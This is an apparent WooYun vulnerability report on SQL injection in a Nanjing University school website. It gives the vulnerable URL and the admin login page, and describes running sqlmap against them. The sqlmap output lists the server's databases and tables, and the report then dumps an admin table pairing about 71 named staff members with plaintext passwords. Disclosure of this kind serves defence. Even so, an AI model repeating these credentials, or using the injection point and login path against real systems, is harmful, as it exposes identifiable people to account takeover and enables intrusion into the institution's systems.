当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0114938

漏洞标题:南京大学工程管理学院存在SQL注入一枚(泄露数据库信息)

相关厂商:nju.edu.cn

漏洞作者: 尊-折戟

提交时间:2015-05-19 16:04

修复时间:2015-07-03 16:28

公开时间:2015-07-03 16:28

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:7

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-19: 细节已通知厂商并且等待厂商处理中
2015-05-19: 厂商已经确认,细节仅向厂商公开
2015-05-29: 细节向核心白帽子及相关领域专家公开
2015-06-08: 细节向普通白帽子公开
2015-06-18: 细节向实习白帽子公开
2015-07-03: 细节向公众公开

简要描述:

南京大学工程管理学院sql注入,泄露部分人员信息

详细说明:

注入点:

http://sme.nju.edu.cn/content/news_detail.php?id=89


V[3K(D%C[O]~H9J0Z)TG$JI.jpg


)A~(40@AT76XV@(3Y}8SONN.jpg


ZN$EF5Q9~W3JU~FUT_7DLLF.jpg


直接用sqlmap跑一下,跑出服务器系统和权限

YE133`6TEADQEJD$HK_SLA2.jpg


没想到权限这么多!
跑下数据库和表名如下:

N3]%6`8HBJ8NNA]A3V}L}`K.png


---
[13:41:47] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.4, PHP 5.4.19
back-end DBMS: MySQL 5.0.12
[13:41:47] [INFO] fetching database names
[13:41:47] [INFO] the SQL query used returns 9 entries
[13:41:47] [INFO] resumed: information_schema
[13:41:47] [INFO] resumed: cdcol
[13:41:47] [INFO] resumed: mysql
[13:41:47] [INFO] resumed: performance_schema
[13:41:47] [INFO] resumed: phpmyadmin
[13:41:47] [INFO] resumed: smee
[13:41:47] [INFO] resumed: test
[13:41:47] [INFO] resumed: webauth
[13:41:48] [INFO] resumed: yuhonghai
[13:41:48] [INFO] fetching tables for databases: 'cdcol, informati
ma, phpmyadmin, smee, test, webauth, yuhonghai'
[13:41:48] [INFO] the SQL query used returns 154 entries
Database: cdcol
[1 table]
+----------------------------------------------+
| cds                                          |
+----------------------------------------------+
Database: phpmyadmin
[12 tables]
+----------------------------------------------+
| pma_bookmark                                 |
| pma_column_info                              |
| pma_designer_coords                          |
| pma_history                                  |
| pma_pdf_pages                                |
| pma_recent                                   |
| pma_relation                                 |
| pma_table_coords                             |
| pma_table_info                               |
| pma_table_uiprefs                            |
| pma_tracking                                 |
| pma_userconfig                               |
+----------------------------------------------+
Database: performance_schema
[17 tables]
+----------------------------------------------+
| cond_instances                               |
| events_waits_current                         |
| events_waits_history                         |
| events_waits_history_long                    |
| events_waits_summary_by_instance             |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_global_by_event_name    |
| file_instances                               |
| file_summary_by_event_name                   |
| file_summary_by_instance                     |
| mutex_instances                              |
| performance_timers                           |
| rwlock_instances                             |
| setup_consumers                              |
| setup_instruments                            |
| setup_timers                                 |
| threads                                      |
+----------------------------------------------+
Database: smee
[26 tables]
+----------------------------------------------+
| admin                                        |
| t_basic_info                                 |
| t_category                                   |
| t_cbzz                                       |
| t_ddsm                                       |
| t_fblw                                       |
| t_gllt                                       |
| t_hjqk                                       |
| t_hzjl                                       |
| t_jrlt                                       |
| t_jrlt_bak                                   |
| t_jszz                                       |
| t_jxkc                                       |
| t_kyxm                                       |
| t_kyxm_gj                                    |
| t_kyxm_hxyb                                  |
| t_kyxm_hxzd                                  |
| t_kyxm_sbj                                   |
| t_news                                       |
| t_rych                                       |
| t_shzw                                       |
| t_xydt                                       |
| t_yjfx                                       |
| t_zlfm                                       |
| t_zlyl                                       |
| t_zwmjjt                                     |
+----------------------------------------------+
Database: yuhonghai
[32 tables]
+----------------------------------------------+
| user                                         |
| admin                                        |
| football                                     |
| kejian                                       |
| news                                         |
| notice                                       |
| report                                       |
| t_basic_info                                 |
| t_category                                   |
| t_cbzz                                       |
| t_ddsm                                       |
| t_fblw                                       |
| t_gllt                                       |
| t_hjqk                                       |
| t_hzjl                                       |
| t_jrlt                                       |
| t_jrlt_bak                                   |
| t_jszz                                       |
| t_jxkc                                       |
| t_kyxm                                       |
| t_kyxm_gj                                    |
| t_kyxm_hxyb                                  |
| t_kyxm_hxzd                                  |
| t_kyxm_sbj                                   |
| t_news                                       |
| t_rych                                       |
| t_shzw                                       |
| t_xydt                                       |
| t_yjfx                                       |
| t_zlfm                                       |
| t_zlyl                                       |
| t_zwmjjt                                     |
+----------------------------------------------+
Database: webauth
[1 table]
+----------------------------------------------+
| user_pwd                                     |
+----------------------------------------------+
Database: mysql
[24 tables]
+----------------------------------------------+
| user                                         |
| columns_priv                                 |
| db                                           |
| event                                        |
| func                                         |
| general_log                                  |
| help_category                                |
| help_keyword                                 |
| help_relation                                |
| help_topic                                   |
| host                                         |
| ndb_binlog_index                             |
| plugin                                       |
| proc                                         |
| procs_priv                                   |
| proxies_priv                                 |
| servers                                      |
| slow_log                                     |
| tables_priv                                  |
| time_zone                                    |
| time_zone_leap_second                        |
| time_zone_name                               |
| time_zone_transition                         |
| time_zone_transition_type                    |
+----------------------------------------------+
Database: test
[1 table]
+----------------------------------------------+
| t_news                                       |
+----------------------------------------------+
Database: information_schema
[40 tables]
+----------------------------------------------+
| CHARACTER_SETS                               |
| COLLATIONS                                   |
| COLLATION_CHARACTER_SET_APPLICABILITY        |
| COLUMNS                                      |
| COLUMN_PRIVILEGES                            |
| ENGINES                                      |
| EVENTS                                       |
| FILES                                        |
| GLOBAL_STATUS                                |
| GLOBAL_VARIABLES                             |
| INNODB_BUFFER_PAGE                           |
| INNODB_BUFFER_PAGE_LRU                       |
| INNODB_BUFFER_POOL_STATS                     |
| INNODB_CMP                                   |
| INNODB_CMPMEM                                |
| INNODB_CMPMEM_RESET                          |
| INNODB_CMP_RESET                             |
| INNODB_LOCKS                                 |
| INNODB_LOCK_WAITS                            |
| INNODB_TRX                                   |
| KEY_COLUMN_USAGE                             |
| PARAMETERS                                   |
| PARTITIONS                                   |
| PLUGINS                                      |
| PROCESSLIST                                  |
| PROFILING                                    |
| REFERENTIAL_CONSTRAINTS                      |
| ROUTINES                                     |
| SCHEMATA                                     |
| SCHEMA_PRIVILEGES                            |
| SESSION_STATUS                               |
| SESSION_VARIABLES                            |
| STATISTICS                                   |
| TABLES                                       |
| TABLESPACES                                  |
| TABLE_CONSTRAINTS                            |
| TABLE_PRIVILEGES                             |
| TRIGGERS                                     |
| USER_PRIVILEGES                              |
| VIEWS                                        |
+----------------------------------------------+


查看一下信息,发现。。。

QGES9TW_8}2M1VG%WG~VO1X.png


Database: smee
Table: admin
[71 entries]
+--------------------+-----------------+
| user_name          | user_pass       |
+--------------------+-----------------+
| admin              | novaadminnju520 |
| 陈春林                | 000000          |
| 陈国华                | 0               |
| 陈强                 | 0               |
| 陈莹                 | 0               |
| 程书萍                | 0               |
| 高俊                 | 0               |
| 郭亚敏                | 0               |
| 黄奇                 | 0               |
| 蒋军锋                | 0               |
| 焦小澄                | 0               |
| 宋跃江                | 0               |
| 许国良                | 0               |
| 瞿慧                 | 358358          |
| 李民                 | 0               |
| 李迁                 | 0000            |
| 李心丹                | 83597503        |
| 刘海飞                | 0               |
| 刘慧敏                | 0               |
| 路元刚                | 83597544        |
| 王峰                 | 83595506        |
| 王顺                 | 0               |
| 肖斌卿                | 101932          |
| 肖条军                | 7371            |
| 徐薇                 | 97123070        |
| 徐伟弘                | 0               |
| 杨佩                 | 0               |
| 张兵                 | 0               |
| 周晶                 | 0               |
| 周跃进                | 406806          |
| 周运森                | 0               |
| 朱洪亮                | 0               |
| 朱华桂                | 726082          |
| 朱美琳                | 0               |
| 朱庆华                | 0               |
| 沈厚才                | 86205844        |
| 周献中                | 11xy69mx54zx    |
| 盛昭瀚                | 0               |
| 李敬泉                | 0000            |
| 徐峰                 | 000000          |
| 陈星光                | 0               |
| 李华雄                | 218000          |
| 朱张青                | 0               |
| 赵佳宝                | 0               |
| 杜建国                | 0               |
| 鲍晓毅                | 0               |
| 俞红海                | 789456123       |
| 李娟                 | 0000            |
| 李维                 | 0000            |
| 李密                 | 0               |
| 刘烨                 | 0               |
| 徐敏                 | 0               |
| Hongjun Yan(炎宏军)   | 0               |
| Jeff L.Hong(洪流)    | 0               |
| 张旭苹                | 204001          |
| 毕军                 | 0               |
| 方立兵                | fanglibing      |
| 张益昕                | cityhunter      |
| Liu Li             | 111111          |
| Hans Jürgen Kracht | hjkracht        |
| 陈彩华                | 000000          |
| 杨学伟                | a266456a        |
| 唐迪明                | 83597501        |
| 朱海滨                | zhb63322        |
| 葛敏                 | 0619            |
| 王博                 | 0000            |
| 张莲民                | 0000            |
| 林良才                | 000000          |
| 徐红利                | hlxu46575719    |
| 李东昕                | lee820109       |
| 章嘉丽                | 000000          |
+--------------------+-----------------+


泄露如此严重。。。
最后在查看一下用户

L9Q5Q3[3888M9_R}~P%`EQ3.png


5S}_$KEZ$KXJG%ELLP(DLY0.png


这是后台地址:

http://sme.nju.edu.cn/content/admin/sem_user/admin_php/Login.php


我怎么搞,不过可以进的,但还是不要破坏教学系统最好吧。。
就到这了!

漏洞证明:

V[3K(D%C[O]~H9J0Z)TG$JI.jpg


)A~(40@AT76XV@(3Y}8SONN.jpg


ZN$EF5Q9~W3JU~FUT_7DLLF.jpg


YE133`6TEADQEJD$HK_SLA2.jpg


N3]%6`8HBJ8NNA]A3V}L}`K.png

修复方案:

过滤关键字,用安全狗拦截特殊字符!

版权声明:转载请注明来源 尊-折戟@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-05-19 16:27

厂商回复:

我们会通知相关院系进行处理。

最新状态:

暂无